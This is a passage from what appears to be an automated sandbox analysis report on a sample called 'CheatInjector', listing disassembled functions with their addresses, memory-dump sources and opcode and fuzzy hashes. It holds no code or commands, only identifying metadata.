                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bcb3650da27ed184124ec50efce1ae86dde6bc3b163050f774751a4bd3dce6da
                                                                • Instruction ID: 09163a53c458d294f13d79fb07132a05a78909a597acbdcd669c19d76f031b6c
                                                                • Opcode Fuzzy Hash: bcb3650da27ed184124ec50efce1ae86dde6bc3b163050f774751a4bd3dce6da
                                                                • Instruction Fuzzy Hash: 5071113E60DAA197D718993C6C603B97E432FD3334F2D8B6DE5F24B3E1C56648469241
                                                                Function 00515280 Relevance: .2, Instructions: 241COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7ab829fbf2770b3900ceec53d54175436f12c907ec3e3acca3a8e438882d6b6e
                                                                • Instruction ID: 21cbebb2e5a9f49807c0c5a24cf6a947ee2d60b40ac4d122bdea4a4f5f9b915b
                                                                • Opcode Fuzzy Hash: 7ab829fbf2770b3900ceec53d54175436f12c907ec3e3acca3a8e438882d6b6e
                                                                • Instruction Fuzzy Hash: 5151ADB1600704DBEB209F24CC86BB77BA4FF81359F184958F9968B291F3B5D881C766
                                                                Function 0051B420 Relevance: .2, Instructions: 233COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b02ca695080f5075cf8e58b9a298b8aa4afed9e734592f30eb8d667798b4ebd8
                                                                • Instruction ID: 61bb126c12caf868fc42c9096054af4ec884bba8fea8d69241155c3d0e7a441c
                                                                • Opcode Fuzzy Hash: b02ca695080f5075cf8e58b9a298b8aa4afed9e734592f30eb8d667798b4ebd8
                                                                • Instruction Fuzzy Hash: 5571D2726183658FD324CF24984179FBBE2EBC5304F05892DE8E99B385C774990A9BC2
                                                                Function 00511690 Relevance: .2, Instructions: 224COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ca6506d84c5db2332c23763d4d980a445c5b540295b5b72c8de1e11c698eba67
                                                                • Instruction ID: 78046ec5e8952cb163b8cb8dbd90fe9cfb6daf90b6301a699ebefbc5b9e09807
                                                                • Opcode Fuzzy Hash: ca6506d84c5db2332c23763d4d980a445c5b540295b5b72c8de1e11c698eba67
                                                                • Instruction Fuzzy Hash: 3C610437F1AD914BE7148A7D4C012E9AE532BD7334B3EC3A6DAB49B3D1C62688424394
                                                                Function 0051A732 Relevance: .2, Instructions: 222COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a97fb27c2a3d485961ba2c6af752bbe6d44e56761196948109c3fb7b06dedd02
                                                                • Instruction ID: 185860da4ee2231852d0ce651b2cc1b2da464a7e8f96d2edc75818309ef7957f
                                                                • Opcode Fuzzy Hash: a97fb27c2a3d485961ba2c6af752bbe6d44e56761196948109c3fb7b06dedd02
                                                                • Instruction Fuzzy Hash: C051E076B14A024BD748CE3EDD9226FB6D3ABC8210F6DC63DE459C7385EB34D8028651
                                                                Function 004F38D0 Relevance: .2, Instructions: 222COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb6eac535ebcff7f35dc5418b38a07566b9bc9d0997fbe242e42f3fc3a99388f
                                                                • Instruction ID: 5a067838e087d9e7710052a5636757268370607a2485bcd77c0015e9e00b505a
                                                                • Opcode Fuzzy Hash: cb6eac535ebcff7f35dc5418b38a07566b9bc9d0997fbe242e42f3fc3a99388f
                                                                • Instruction Fuzzy Hash: A67117B290874A8BE7258E19C440337BBA2AFE1306F1D816FD6954B381E779DE05C74A
                                                                Function 004F4440 Relevance: .2, Instructions: 208COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b1a966cbdeb16280923f5740a8299c92dd8769a5694a6564315dd2f119c8d948
                                                                • Instruction ID: 4d7d32e465cd3c9c4115ee4fd78cb2847f0f9e080a01a2759f8affbde4383259
                                                                • Opcode Fuzzy Hash: b1a966cbdeb16280923f5740a8299c92dd8769a5694a6564315dd2f119c8d948
                                                                • Instruction Fuzzy Hash: 5771B1B0504701AFD3149F28EC45617BBA1FF81328F14473DE5AA963E1E735D924CB8A
                                                                Function 00523890 Relevance: .2, Instructions: 208COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b4a6d498975cec8a4046b7137c0bfae3be5c46ea105c0ef12b49fc68992caf00
                                                                • Instruction ID: a4b99e72a1a9a9a86c4e09659292f0ca892eb0bbedf579602c82ae294c77e7ca
                                                                • Opcode Fuzzy Hash: b4a6d498975cec8a4046b7137c0bfae3be5c46ea105c0ef12b49fc68992caf00
                                                                • Instruction Fuzzy Hash: 5561E727B199A14BC7185E3C6C512B56E039F93330B2D877ABAF28B3E5C65D890A9350
                                                                Function 0050A05C Relevance: .2, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7ab36f6f75bb13a7fbe6f30c5a3ce4ee879517a05152d920c51a28a359fb11e6
                                                                • Instruction ID: cfdbaca78fa6dfa361a10067bc32d7ead7abd29c4900f9dee2e9b0c423ee43ab
                                                                • Opcode Fuzzy Hash: 7ab36f6f75bb13a7fbe6f30c5a3ce4ee879517a05152d920c51a28a359fb11e6
                                                                • Instruction Fuzzy Hash: 6B915961508BC18AD3268B3C88882167F926B67228F2887DDD1E94F7D3D36BD507C766
                                                                Function 00529200 Relevance: .2, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5d878b632fe7c0e0f0c71bc0222669f8de08bc445dd1025a5533bf25d82538c9
                                                                • Instruction ID: a2620e428b4c18763404a4a6fc4009a52df7b9ced7e7a24d257e82415e6809fc
                                                                • Opcode Fuzzy Hash: 5d878b632fe7c0e0f0c71bc0222669f8de08bc445dd1025a5533bf25d82538c9
                                                                • Instruction Fuzzy Hash: CE515CB55087548FE314DF29D89435BBBE1BBC5318F144E2DE4E987391E379DA088B82
                                                                Function 004FC730 Relevance: .2, Instructions: 185COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc4932b3efd966ab08075767f5bd74f0277754d046e2557d7271c2e214fa6882
                                                                • Instruction ID: 9e5ff2bd2354e24d6c6cb2bf5de4cf6d80581201936cad8361256b2c7dea536a
                                                                • Opcode Fuzzy Hash: bc4932b3efd966ab08075767f5bd74f0277754d046e2557d7271c2e214fa6882
                                                                • Instruction Fuzzy Hash: 34514976A1D59E4BC7189E3C4D901796A425F93370B3E836BDEB2973E1C3194C02939A
                                                                Function 0050B826 Relevance: .2, Instructions: 167COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b6cbc525a8e52ce2e35ae8ee2daa02a5b372dffe3b0e62903a6357c17e44d0db
                                                                • Instruction ID: 85d4afa603328afcdf92d2c625428a14909a5e0805b611905e8e24991ed6ae25
                                                                • Opcode Fuzzy Hash: b6cbc525a8e52ce2e35ae8ee2daa02a5b372dffe3b0e62903a6357c17e44d0db
                                                                • Instruction Fuzzy Hash: 0541CFB09102158BDB24DF18C8D2B7B73B4FF66364F098618E995AB3E5F334A900C3A5
                                                                Function 004F4190 Relevance: .2, Instructions: 163COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0a0448056e9424624ec9a9758382ac5354afa57b27a2a9e93b1f5d6993c71929
                                                                • Instruction ID: c3b02c81cd1d97896830b559c75c94d3160d4cc7fa41f4261ef52a235932942d
                                                                • Opcode Fuzzy Hash: 0a0448056e9424624ec9a9758382ac5354afa57b27a2a9e93b1f5d6993c71929
                                                                • Instruction Fuzzy Hash: D451B074A082089FC7149F58C48092BB7A1FFC6364F1646AEFD958B352DB35EC42CB96
                                                                Function 00523AF0 Relevance: .2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 659fa6c74bc71c19459891f374d33dc4f7d08c9018f9c0651f1a40562bdb4e7e
                                                                • Instruction ID: cada72ceb2f9f432bc9a74fc9db5999b42b3f933a9875f5894e06542676f24ae
                                                                • Opcode Fuzzy Hash: 659fa6c74bc71c19459891f374d33dc4f7d08c9018f9c0651f1a40562bdb4e7e
                                                                • Instruction Fuzzy Hash: 1E51F32664D9A147E7248B3C6C512696E931F93334B3D8B6DE4F2AB3E1C2598D0A9381
                                                                Function 00503FE7 Relevance: .1, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9ccad2c08386c89c502b8e03364199f40c95f1774c186756e04e6c9daed4c508
                                                                • Instruction ID: b73201b3ed4988d91c2f5cddb021b1d605b7d2887e25ab52c5dd707bfb3566a0
                                                                • Opcode Fuzzy Hash: 9ccad2c08386c89c502b8e03364199f40c95f1774c186756e04e6c9daed4c508
                                                                • Instruction Fuzzy Hash: 77513871614B408BD329CF38C5987BBBFE2AB95314F494E3DC6EB87386DA35A4018701
                                                                Function 00530555 Relevance: .1, Instructions: 114COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4d0ac54ca7eb83348bd092e6376686e5de34f950e0ce67964861a439c4361aa1
                                                                • Instruction ID: 2af85b761eb83255de4a15ea5054a8aeb1325fbe8fba3c0a444f4017a87d3873
                                                                • Opcode Fuzzy Hash: 4d0ac54ca7eb83348bd092e6376686e5de34f950e0ce67964861a439c4361aa1
                                                                • Instruction Fuzzy Hash: 0D312F72E087608BC31CCF29C8A2136FBE1AB8B310F4E666ED451DB295DA30DD048794
                                                                Function 00532366 Relevance: .1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 33d4790650283d0ac3f8f9daef7b6f978762018ab498363eb13640a2590e89fd
                                                                • Instruction ID: 3a940e7dd011e1a59e5ea0e9a8c5f7bb993d5a735538f15f793bea97393c2316
                                                                • Opcode Fuzzy Hash: 33d4790650283d0ac3f8f9daef7b6f978762018ab498363eb13640a2590e89fd
                                                                • Instruction Fuzzy Hash: 5431C032F055254BCB18CE69C9812EEFBF3BBD9320F2DD225D414AB255D638DE068790
                                                                Function 004F30C0 Relevance: .1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7f37c746c93d48367a031876ee6c211faa462a5da74f017e14c093c4f6cef670
                                                                • Instruction ID: ccd3baec8b78393f9f4208f9eb2fe869ec3797c05b085abb3ae32932291b5551
                                                                • Opcode Fuzzy Hash: 7f37c746c93d48367a031876ee6c211faa462a5da74f017e14c093c4f6cef670
                                                                • Instruction Fuzzy Hash: 9131EA716082089BD710DE19CD8093BB7E1EF85355F18892EEA9AC7341D339DE42CB5A
                                                                Function 00519850 Relevance: .1, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 029c09b5b4c29535de8deefdf9dcb66edce257bd57902f495d713f20b8c6e5bf
                                                                • Instruction ID: b5ce65f2d3b70a32d098de28a0509576de7ded26594e3f625932939368e2fa51
                                                                • Opcode Fuzzy Hash: 029c09b5b4c29535de8deefdf9dcb66edce257bd57902f495d713f20b8c6e5bf
